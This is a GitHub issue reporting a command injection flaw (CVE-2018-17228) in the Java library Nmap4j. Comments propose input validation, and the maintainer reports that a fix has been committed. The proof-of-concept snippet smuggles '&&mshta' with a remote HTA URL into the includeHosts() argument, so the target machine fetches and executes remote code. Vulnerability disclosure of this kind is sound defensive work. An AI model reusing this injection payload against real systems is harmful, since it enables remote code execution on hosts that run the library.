New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
command execution vulnerability #9
Comments
|
CVE-2018-17228 was assigned to this issue. |
|
A possible fix is to limit includeHosts to only accept one of the following options: Single IP - 192.168.1.1 -> easy regex I would still recommend input validation when exposing this library publicy (in an API for example) |
|
Validation added in 06b58aa |
String path = "D:\Nmap";
String op = "-T4 -p4999";
Nmap4j nmap4j = new Nmap4j(path);
nmap4j.includeHosts("118.24.74.232&&mshta http://118.24.74.232:4999/test.hta");
nmap4j.addFlags(op);
nmap4j.execute();
over here,the nmap4j.includeHosts() original intention is to receive hosts. When we add custom commands behind it, it will be executed.
The text was updated successfully, but these errors were encountered: